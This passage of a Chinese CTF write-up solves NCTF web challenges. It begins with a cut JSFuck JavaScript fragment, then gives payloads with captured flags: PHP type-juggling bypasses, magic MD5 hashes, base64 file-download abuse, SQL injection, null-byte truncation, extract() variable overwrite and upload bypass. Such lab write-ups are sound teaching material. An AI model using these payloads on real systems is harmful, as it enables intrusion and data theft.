])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[+[]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))()
控制台执行,页面显示一个php文件，文件名是md5加密，解密为md5.php。

1bc29b36f623ba82aaf6724fd3b16718.php

打开网页
tip:history of bash
“.bash_history”文件保存执行的history命令。
打开.bash_history
http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/.bash_history

zip -r flagbak.zip ./*

打开flagbak.zip
直接可下载，是一个flag.txt文件

flag is:nctf{bash_history_means_what}

flag is:nctf{bash_history_means_what}

pass check

核心源码

<?php
$pass=@$_POST['pass'];
$pass1=***********;//被隐藏起来的密码
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

传送门：题目地址

页面只有一行
please input pass!
分析：
1.看源码意思是post的pass要和pass1相等
2.@在php中是可以屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息，这样用户就看不到程序的出错信息。
3.strcmp()函数

4.两个string相等，则为0，所以在strcmp()前面加了感叹号！。
5.利用PHP弱类型漏洞。
post 一个数组,令strmp()返回null，则"!null"为真,执行echo "flag:nctf{*}"
1.开始是这样构建的pass=[]，没用。

2.应该这样构建pass[]=123

flag:nctf{strcmp_is_n0t_3afe}

Header

头啊！！头啊！！！
传送门: 点我咯

直接看header
nctf{tips_often_hide_here}

文件包含

没错这就是传说中的LFI
传送门点我带你飞
TIPS:http://drops.wooyun.org/tips/3827

不看了，这题和Bugku的（flag在index里）是一样的，参见[Bugku writeup]Web
nctf{edulcni_elif_lacol_si_siht}

单身一百年也没用

是的。。这一题你单身一百年也没用
传送门：biu~

老套路，查看网络状态，点进去看看什么变化
之前index.php的304状态变成了302，flag就在响应头里
nctf{this_is_302_redirect}

Download~!

想下啥就下啥_{别下音乐，不骗你，试试下载其他东西}
真·奥义·传送：点我

查看源码

<pre id="line1">  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>Game 19</title>  
<link href="[templatemo_style.css](view-source:http://way.nuptzj.cn/web6/templatemo_style.css)" rel="stylesheet" type="text/css" />  
</head>  <body>  
<div id="templatemo_container">  <div id="templatemo_header">  <div id="website_title">  </div>  </div>  <div id="templatemo_menu">  
<ul>  <li><a href="[#](view-source:http://way.nuptzj.cn/web6/#)" class="current">Tips</a></li>  <li><b>down</b></li>  
</ul>  </div>  
<div id="templatemo_content_wrapper">  <div id="templatemo_content">  <div class="content_title_01">听会歌吧</div>  <div class="horizontal_divider_01">&nbsp;</div>  <
div class="cleaner">&nbsp;
</div>  
<p>为了让大家更轻松的比赛，为大家准备了两首歌让大家下载</p>  
<p><a href="[download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=](view-source:http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=)" target="_blank">星星点灯</a>
</p>  <p>
<a href="[download.php?url=YnV4aWFuZ3poYW5nZGEubXAz](view-source:http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz)" target="_blank">不想长大</a>
</p>  
<div class="cleaner">&nbsp;
</div>  
</div>  
<div class="cleaner">&nbsp;</div>  
</div>  <div id="templatemo_footer">  
</div>  </div>  </body>  </html></pre>

点击"download.php?url=YnV4aWFuZ3poYW5nZGEubXAz"，文件名base64加密，试试下载其他文件，一般都是想要当前页面的源码，于是将download.php加密，构造：
view-source:http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw,这样可以不用下载就可以看到源码

??<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
    $file_size = filesize($url);
    header ( "Pragma: public" );
    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
    header ( "Cache-Control: private", false );
    header ( "Content-Transfer-Encoding: binary" );
    header ( "Content-Type:audio/mpeg MP3");
    header ( "Content-Length: " . $file_size);
    header ( "Content-Disposition: attachment; filename=".$url);
    echo(file_get_contents($url));
    exit;
}
else {
    echo "Access Forbidden!";
}
?>

继续查看"hereiskey.php"源码：view-source:http://way.nuptzj.cn/web6/download.php?url=aGVyZWlza2V5LnBocA==

?<?php
//flag:nctf{download_any_file_666}
?>

nctf{download_any_file_666}

COOKIE

COOKIE就是甜饼的意思~
地址：传送门

TIP:
0==not

利用tamper data修改cookie的login=1就可以了
显示：
flag:nctf{cookie_is_different_from_session}
nctf{cookie_is_different_from_session}

MYSQL

不能每一题都这么简单嘛
你说是不是？
题目地址

查看robots.txt：http://chinalover.sinaapp.com/web11/robots.txt

鍒お寮€蹇冿紝flag涓嶅湪杩欙紝杩欎釜鏂囦欢鐨勭敤閫斾綘鐪嬪畬浜嗭紵
鍦–TF姣旇禌涓紝杩欎釜鏂囦欢寰€寰€瀛樻斁鐫€鎻愮ず淇℃伅

TIP:sql.php

<?php
if($_GET[id]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $id = intval($_GET[id]);
  $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
  if ($_GET[id]==1024) {
      echo "<p>no! try again</p>";
  }
  else{
    echo($query[content]);
  }
}
?>

对sql.php传入id参数，开始还没相通id=1024的意义，还试着爆破id，后来想想，其实id=1024才是flag的内容。
1.要让$id=1024
2.传入的参数$_GET[id]又不能等于1024
3.利用intval()取整函数构造
令$_GET[id]=1024.1即可：
http://chinalover.sinaapp.com/web11/sql.php?id=1024.1

the flag is:nctf{query_in_mysql}

nctf{query_in_mysql}

md5 collision

源码

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
?>

传送门：题目地址

打开,显示一行字

please input a

要传入一个参数
1.a!=QNKCDZO
2.md5(a)==md5('QNKCDZO')
好像没头绪，看看md5('QNKCDZO')是什么样子：
0e830400451993494058024219903391
0e开头，利用“==”的特性：对比的时候会进行数据转换，0eXXXXXXXXXX 转成0了。
结合0e开头MD5值：

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

传入参数a=s878926199a:
http://chinalover.sinaapp.com/web19/?a=s878926199a

nctf{md5_collision_is_easy}

要看清是get还是post，开始我就一直在post，结果怎么也出不来结果。
nctf{md5_collision_is_easy}

bypass again

地址：依旧是弱类型

来源 hctf

if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}

要求：
1.传入两个参数a和b
2.a!=b
3.md5(a)==md5(b)
利用内置函数的参数的松散性：调用函数时给函数传递函数无法接受的参数类型。
传入两个数组，使得md5()返回null，null==null：
http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2

if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}
Flag: nctf{php_is_so_cool}

这次又搞清是get还是post，又一顿post，真是服了我自己
nctf{php_is_so_cool}

PHP是世界上最好的语言

听说PHP是世界上最好的语言
地址：题目地址

打开index.txt:
http://way.nuptzj.cn/php/index.txt

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

开始还在倒腾 eregi（）函数: 字符串比对解析，与大小写无关。
后面发现源代码里对id又一次urldecode，所以我们要对id两次urlencode
1.因为url编码一般是不会对字母转换的
2.先将hackerDJ转成16进制，再每两个数字前加百分号：%63%6b%65%72%44%4a
3.再urlencode： %2563%256b%2565%2572%2544%254a
http://way.nuptzj.cn/php/index.php/?id=%2563%256b%2565%2572%2544%254a

Access granted!

flag: nctf{php_is_best_language}


Can you authenticate to this website? index.txt

后记：
url解码过程：
%-->%
%25-->%
其实第二次urlencode是对%-->%25,那么可以再对一个字符二次编码即可：%2563%6b%65%72%44%4a，反正其他%依然解码为%
nctf{php_is_best_language}

SQL注入1

听说你也会注入？
地址：题目地址

点source

<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
    echo '</br>'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>

php的点是连接符

SQLstr = "select    *    from abc_table where user_name = ' " . $user_name . " ' ";   
可以改写成
SQLstr = "select    *    from abc_table where user_name = ' $user_name ' ";

没有过滤，SQL注入只需要闭合‘）即可,且user=admin
nctf{ni_ye_hui_sql?}

/x00

题目地址：题目有多种解法，你能想出来几种？

页面给了源码

 view-source:

    if (isset ($_GET['nctf'])) {
        if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
            echo '必须输入数字才行';
        else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
            die('Flag: '.$flag);
        else
            echo '骚年，继续努力吧啊~';
    }

要求：
1.传入nctf参数
2.nctf参数以数字开头，中间多个数字，数字结尾：^[1-9]+$-->全为数字
3.nctf==#biubiubiu，才打印出flag
利用0x00截断ereg()
注意要urlencode:
0x00-->%00
#-->%23
令nctf=123%00%23biubiubiu
刷新出现flag
Flag: flag:nctf{use_00_to_jieduan}
nctf{use_00_to_jieduan}
后记：
令nctf[]=123，得到：
Warning: strpos() expects parameter 1 to be string, array given in web4/f5a14f5e6e3453b78cd73899bad98d53/index.php on line 10
Flag: flag:nctf{use_00_to_jieduan}
解析：
-->ereg()是处理字符串的，当处理数组的时候，返回NULL
-->NULL===FALSE（严格比较返回FALSE）
-->strpos()是处理字符串的，当处理数组的时候，返回NULL
-->NULL===FALSE（严格比较）不成立，NULL!==FALSE，打印flag
参考：

变量覆盖

听说过变量覆盖么？
地址：题目地址

查看source.php

 <?php
include("secret.php");
?>
<html>
    <head>
        <title>The Ducks</title>
        <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
    </head>
    <body>
        <div class="container">
            <div class="jumbotron">
                <center>
                    <h1>The Ducks</h1>
                    <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?></code>
                            </div>
                        <?php } ?>
                    <?php } ?>
                    <form action="." method="POST">
                        <div class="row">
                            <div class="col-md-6 col-md-offset-3">
                                <div class="row">
                                    <div class="col-md-9">
                                        <input type="password" class="form-control" name="pass" placeholder="Password" />
                                    </div>
                                    <div class="col-md-3">
                                        <input type="submit" class="btn btn-primary" value="Submit" />
                                    </div>
                                </div>
                            </div>
                        </div>
                    </form>
                </center>
            </div>
            <p>
                <center>
                    source at <a href="source.php" target="_blank">/source.php</a>
                </center>
            </p>
        </div>
    </body>
</html>

关键信息：

 <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?>

extract() 函数从数组中将变量导入到当前的符号表。
1.该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。
2.由于extrac()的参数是POST，则post一个参数thepassword_123覆盖掉默认的thepassword_123，并且令post的pass=thepassword_123。
nctf{bian_liang_fu_gai!}

上传绕过

题目地址：猜猜代码怎么写的

上传文件绕过类型，打开Burpsuite，上传一个文件试试：

1. filename=1.png
2. uppath=/uploads/1.png

上传一个php吧

1. filename=download.php
2. uppath=/uploads/download.php

分析：
1.上传的文件后缀即是php又是jpg，png，gif。
2.代码对两处进行了匹配：

1. filename
2. 上传路径：/uploads/

